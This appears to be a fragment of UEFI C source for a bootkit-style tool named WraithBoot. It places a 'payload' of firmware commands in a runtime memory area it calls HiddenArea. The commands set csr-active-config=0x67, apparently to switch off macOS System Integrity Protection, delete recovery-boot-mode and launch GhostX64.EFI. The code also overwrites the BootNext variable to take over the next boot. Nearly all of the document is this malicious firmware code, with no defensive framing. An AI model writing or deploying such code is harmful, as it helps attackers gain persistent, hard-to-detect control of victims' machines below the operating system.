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&lt;Uefi.h&gt;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&lt;Library/UefiLib.h&gt;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&lt;Library/UefiBootServicesTableLib.h&gt;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&lt;Library/MemoryAllocationLib.h&gt;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&lt;Library/BaseMemoryLib.h&gt;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&lt;Library/UefiRuntimeServicesTableLib.h&gt;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&lt;Library/PrintLib.h&gt;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&lt;Library/UefiApplicationEntryPoint.h&gt;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PAYLOAD_SIZE 0x1000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EFI_STATUS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EFIAPI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UefiMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable)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*HiddenArea;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CHAR8 *PayloadData = "[WRAITHBOOT_PAYLOAD]\n"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"1|setvar csr-active-config=0x67\n"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"2|deletevar recovery-boot-mode\n"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"3|launch \\EFI\\Custom\\GhostX64.EFI\n";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UINTN DataSize = AsciiStrLen(PayloadData) + 1;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EFI_STATUS Status = gBS-&gt;AllocatePool(EfiRuntimeServicesData, PAYLOAD_SIZE, &amp;HiddenArea);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(EFI_ERROR(Status))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Print(L"Failed to allocate memory: %r\n", Status);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Status;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SetMem(HiddenArea, PAYLOAD_SIZE, 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CopyMem(HiddenArea, PayloadData, DataSize);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Print(L"WraithBoot memory payload mapped at %p\n", HiddenArea);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Optional: Detect trigger to execute further logic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EFI_GUID gEfiGlobalVariableGuid = EFI_GLOBAL_VARIABLE;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UINT16 BootOrder = 0x0001;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Status = gRT-&gt;SetVariable(L"BootNext",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&amp;gEfiGlobalVariableGuid,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EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | EFI_VARIABLE_RUNTIME_ACCESS,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sizeof(BootOrder),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&amp;BootOrder);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(EFI_ERROR(Status))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Print(L"Failed to set BootNext: %r\n", Status);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Print(L"BootNext override to 0x%04x set.\n", BootOrder);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EFI_SUCCESS;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